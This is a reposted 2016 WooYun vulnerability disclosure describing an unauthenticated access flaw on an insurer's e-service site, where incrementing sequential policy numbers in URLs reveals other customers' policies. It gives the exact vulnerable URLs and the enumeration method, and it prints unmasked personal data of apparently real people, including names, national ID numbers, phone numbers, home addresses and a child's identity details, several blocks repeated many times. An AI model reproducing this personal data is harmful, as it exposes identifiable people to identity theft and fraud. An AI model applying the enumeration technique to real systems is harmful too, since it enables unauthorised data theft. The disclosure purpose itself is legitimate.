华夏人寿某站安全漏洞导致大量用户保单信息泄露(含保单号/投保人/被保人/身份证/联系电话/地址)

admin
admin
admin
139297
文章
114
评论
2017年4月27日13:05:33评论380 views字数 256阅读0分51秒阅读模式
摘要

2016-05-03: 细节已通知厂商并且等待厂商处理中
2016-05-04: 厂商已经确认,细节仅向厂商公开
2016-05-14: 细节向核心白帽子及相关领域专家公开
2016-05-24: 细节向普通白帽子公开
2016-06-03: 细节向实习白帽子公开
2016-06-18: 细节向公众公开

漏洞概要 关注数(6) 关注此漏洞

缺陷编号: WooYun-2016-204595

漏洞标题: 华夏人寿某站安全漏洞导致大量用户保单信息泄露(含保单号/投保人/被保人/身份证/联系电话/地址)

相关厂商: hxlife.com

漏洞作者: 0x 80

提交时间: 2016-05-03 15:21

公开时间: 2016-06-18 08:10

漏洞类型: 敏感信息泄露

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 敏感信息泄露 错误信息未屏蔽 用户敏感信息泄漏

0人收藏

漏洞详情

披露状态:

2016-05-03: 细节已通知厂商并且等待厂商处理中
2016-05-04: 厂商已经确认,细节仅向厂商公开
2016-05-14: 细节向核心白帽子及相关领域专家公开
2016-05-24: 细节向普通白帽子公开
2016-06-03: 细节向实习白帽子公开
2016-06-18: 细节向公众公开

简要描述:

华夏人寿某站安全漏洞导致大量用户保单信息泄露(含保单号/投保人/被保人/身份证/联系电话/地址)

详细说明:

http://eservice.hxlife.com/Policy/policyContent.do?policyNo=2015137350421088

华夏人寿某站安全漏洞导致大量用户保单信息泄露(含保单号/投保人/被保人/身份证/联系电话/地址)

这里直接未授权访问

code 区域 
保单详细信息
 保单号  2015137350421088  保单状态  有效
 主附险标志  主险  险种名称  华夏财富一号两全保险C款(万能型,升级版)
 保险期间  75岁  基本保额  0.00
 期交保费  23000.00  已交费期数  1
 是否自动续保  非自动续保
code 区域 
投保人信息
 投保人姓名  徐苑珍  性别  女
 证件类型  居民身份证  证件号码  44142719530825032X
 出生日期  1953-08-25  联系电话  13431080800
 电子邮箱   邮政编码  510600
 联系地址  中国广东省广州市白云区人和溪苑B7栋602
code 区域 
被保人信息
 与投保人关系  本人  被投保人姓名  徐苑珍
 性别  女  出生日期  1953-08-25
 证件类型  居民身份证  证件号码  44142719530825032X
 联系电话  13431080800  电子邮箱  
 邮政编码  510600  联系地址  中国广东省广州市白云区人和溪苑B7栋602

由于ID未加密,经过分析修改即可查看任意其他人的保单信息

2015137350521088,ID未加密,依次类推逻辑

http://eservice.hxlife.com/Policy/passiveQuery.do?policyNo=2015137350521088

code 区域 
被保人信息
 与投保人关系  本人  被投保人姓名  王玉全
 性别  男  出生日期  1954-07-14
 证件类型  居民身份证  证件号码  41292419540714071X
 联系电话  13949375962  电子邮箱  
 邮政编码  473000  联系地址  中国河南省南阳市卧龙区谢庄乡孙庄村秋树庄22号
code 区域 
投保人姓名  王玉全  性别  男
 证件类型  居民身份证  证件号码  41292419540714071X
 出生日期  1954-07-14  联系电话  13949375962
 电子邮箱   邮政编码  473000
 联系地址  中国河南省南阳市卧龙区谢庄乡孙庄村秋树庄22号
code 区域 
保单号  2015137350521088  保单状态  有效
 主附险标志  主险  险种名称  华夏财富一号两全保险C款(万能型,升级版)
 保险期间  75岁  基本保额  0.00
 期交保费  15000.00  已交费期数  1
 是否自动续保  非自动续保

http://eservice.hxlife.com/Policy/policyContent.do?policyNo=2015137350621088

华夏人寿某站安全漏洞导致大量用户保单信息泄露(含保单号/投保人/被保人/身份证/联系电话/地址)

code 区域 
与投保人关系  女儿  被投保人姓名  左原
 性别  女  出生日期  2009-07-15
 证件类型  居民户口薄  证件号码  510603200907150989
 联系电话   电子邮箱  
 邮政编码  618000  联系地址  中国四川省德阳市旌阳区南滨佳苑A区2-13-1
code 区域 
受益人姓名  左原  性别  女
 证件号码  510603200907150989  证件类型  居民户口薄
 固定电话  13981091993  出生日期  2009-07-15
code 区域 
险种名称  华夏金管家年金保险(万能型,C款)  主副险标识  1
 交费类型  首期收  交费方式  银行转账
 应交金额  0.00  实交金额  0.00
 已交保费次数  1  累计已交保费  10000.00
 下次交费日期   下次交费金额  0.00
 应交日期  2015-11-20  实交日期  20151120
 险种名称  华夏金管家年金保险(万能型,C款)  主副险标识  1
 交费类型  首期收  交费方式  银行转账
 应交金额  0.00  实交金额  0.00
 已交保费次数  1  累计已交保费  10000.00
 下次交费日期   下次交费金额  0.00
 应交日期  2015-11-20  实交日期  20151120
 险种名称  华夏金管家年金保险(万能型,C款)  主副险标识  1
 交费类型  首期收  交费方式  银行转账
 应交金额  0.00  实交金额  0.00
 已交保费次数  1  累计已交保费  15000.00
 下次交费日期  2016-11-21  下次交费金额  15000.00
 应交日期  2015-11-20  实交日期  20151120
 险种名称  华夏金管家年金保险(万能型,C款)  主副险标识  1
 交费类型  首期收  交费方式  银行转账
 应交金额  0.00  实交金额  0.00
 已交保费次数  1  累计已交保费  15000.00
 下次交费日期  2016-11-21  下次交费金额  15000.00
 应交日期  2015-11-20  实交日期  20151120
code 区域 
2015-11-21  0  首期缴费  0.00  0.00  0.00  
 2015-11-21  0  生存金转入  4140.00  0.00  4140.00  
 2015-12-01  0.068  结算利息  7.47  0.00  4147.47  
 2016-01-01  0.068  结算利息  23.24  0.00  4170.71  
 2016-01-06  0  追加保费  10000.00  0.00  14170.71  
 2016-02-01  0.068  结算利息  70.15  0.00  14240.86  
 2016-03-01  0.068  结算利息  74.43  0.00  14315.29  
 2016-04-01  0.068  结算利息  79.99  0.00  14395.28
code 区域 
投保人信息
 投保人姓名  徐苑珍  性别  女
 证件类型  居民身份证  证件号码  44142719530825032X
 出生日期  1953-08-25  联系电话  13431080800
 电子邮箱   邮政编码  510600
 联系地址  中国广东省广州市白云区人和溪苑B7栋602

0

code 区域 
投保人信息
 投保人姓名  徐苑珍  性别  女
 证件类型  居民身份证  证件号码  44142719530825032X
 出生日期  1953-08-25  联系电话  13431080800
 电子邮箱   邮政编码  510600
 联系地址  中国广东省广州市白云区人和溪苑B7栋602

1

code 区域 
投保人信息
 投保人姓名  徐苑珍  性别  女
 证件类型  居民身份证  证件号码  44142719530825032X
 出生日期  1953-08-25  联系电话  13431080800
 电子邮箱   邮政编码  510600
 联系地址  中国广东省广州市白云区人和溪苑B7栋602

2

code 区域 
投保人信息
 投保人姓名  徐苑珍  性别  女
 证件类型  居民身份证  证件号码  44142719530825032X
 出生日期  1953-08-25  联系电话  13431080800
 电子邮箱   邮政编码  510600
 联系地址  中国广东省广州市白云区人和溪苑B7栋602

3

http://eservice.hxlife.com/Policy/shouyimanQuery.do?policyNo=2015137350623088

code 区域 
投保人信息
 投保人姓名  徐苑珍  性别  女
 证件类型  居民身份证  证件号码  44142719530825032X
 出生日期  1953-08-25  联系电话  13431080800
 电子邮箱   邮政编码  510600
 联系地址  中国广东省广州市白云区人和溪苑B7栋602

4

code 区域 
投保人信息
 投保人姓名  徐苑珍  性别  女
 证件类型  居民身份证  证件号码  44142719530825032X
 出生日期  1953-08-25  联系电话  13431080800
 电子邮箱   邮政编码  510600
 联系地址  中国广东省广州市白云区人和溪苑B7栋602

5

code 区域 
投保人信息
 投保人姓名  徐苑珍  性别  女
 证件类型  居民身份证  证件号码  44142719530825032X
 出生日期  1953-08-25  联系电话  13431080800
 电子邮箱   邮政编码  510600
 联系地址  中国广东省广州市白云区人和溪苑B7栋602

6

code 区域 
投保人信息
 投保人姓名  徐苑珍  性别  女
 证件类型  居民身份证  证件号码  44142719530825032X
 出生日期  1953-08-25  联系电话  13431080800
 电子邮箱   邮政编码  510600
 联系地址  中国广东省广州市白云区人和溪苑B7栋602

7

code 区域 
投保人信息
 投保人姓名  徐苑珍  性别  女
 证件类型  居民身份证  证件号码  44142719530825032X
 出生日期  1953-08-25  联系电话  13431080800
 电子邮箱   邮政编码  510600
 联系地址  中国广东省广州市白云区人和溪苑B7栋602

8

code 区域 
投保人信息
 投保人姓名  徐苑珍  性别  女
 证件类型  居民身份证  证件号码  44142719530825032X
 出生日期  1953-08-25  联系电话  13431080800
 电子邮箱   邮政编码  510600
 联系地址  中国广东省广州市白云区人和溪苑B7栋602

9

http://eservice.hxlife.com/Policy/passiveQuery.do?policyNo=2015137350624+1逻辑查询上万用户订单088

漏洞证明:

code 区域 
被保人信息
 与投保人关系  本人  被投保人姓名  徐苑珍
 性别  女  出生日期  1953-08-25
 证件类型  居民身份证  证件号码  44142719530825032X
 联系电话  13431080800  电子邮箱  
 邮政编码  510600  联系地址  中国广东省广州市白云区人和溪苑B7栋602

0

code 区域 
被保人信息
 与投保人关系  本人  被投保人姓名  徐苑珍
 性别  女  出生日期  1953-08-25
 证件类型  居民身份证  证件号码  44142719530825032X
 联系电话  13431080800  电子邮箱  
 邮政编码  510600  联系地址  中国广东省广州市白云区人和溪苑B7栋602

1

code 区域 
被保人信息
 与投保人关系  本人  被投保人姓名  徐苑珍
 性别  女  出生日期  1953-08-25
 证件类型  居民身份证  证件号码  44142719530825032X
 联系电话  13431080800  电子邮箱  
 邮政编码  510600  联系地址  中国广东省广州市白云区人和溪苑B7栋602

2

code 区域 
被保人信息
 与投保人关系  本人  被投保人姓名  徐苑珍
 性别  女  出生日期  1953-08-25
 证件类型  居民身份证  证件号码  44142719530825032X
 联系电话  13431080800  电子邮箱  
 邮政编码  510600  联系地址  中国广东省广州市白云区人和溪苑B7栋602

3

code 区域 
被保人信息
 与投保人关系  本人  被投保人姓名  徐苑珍
 性别  女  出生日期  1953-08-25
 证件类型  居民身份证  证件号码  44142719530825032X
 联系电话  13431080800  电子邮箱  
 邮政编码  510600  联系地址  中国广东省广州市白云区人和溪苑B7栋602

4

code 区域 
被保人信息
 与投保人关系  本人  被投保人姓名  徐苑珍
 性别  女  出生日期  1953-08-25
 证件类型  居民身份证  证件号码  44142719530825032X
 联系电话  13431080800  电子邮箱  
 邮政编码  510600  联系地址  中国广东省广州市白云区人和溪苑B7栋602

5

code 区域 
被保人信息
 与投保人关系  本人  被投保人姓名  徐苑珍
 性别  女  出生日期  1953-08-25
 证件类型  居民身份证  证件号码  44142719530825032X
 联系电话  13431080800  电子邮箱  
 邮政编码  510600  联系地址  中国广东省广州市白云区人和溪苑B7栋602

6

code 区域 
被保人信息
 与投保人关系  本人  被投保人姓名  徐苑珍
 性别  女  出生日期  1953-08-25
 证件类型  居民身份证  证件号码  44142719530825032X
 联系电话  13431080800  电子邮箱  
 邮政编码  510600  联系地址  中国广东省广州市白云区人和溪苑B7栋602

7

修复方案:

版权声明:转载请注明来源 0x 80@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2016-05-04 08:01

厂商回复:

修复中

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):

登陆后才能进行评分

0%

0%

0%

0%

100%

评价

  1. 2016-05-03 15:32 | Aasron ( 普通白帽子 | Rank:905 漏洞数:163 | raw_input("你知道我要输入什么?"))

    1

    hello

  2. 2016-05-03 15:33 | 0x 80 ( 普通白帽子 | Rank:1845 漏洞数:509 | If we give enough, if we learn to trust ...)

    0

    @Aasron 嗯

  3. 2016-06-18 10:41 | F4sker ( 路人 | Rank:4 漏洞数:1 | 人的一生只是为了归根吗? ----F4sker)

    0

    不打马,差评。泄露他人隐私。

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin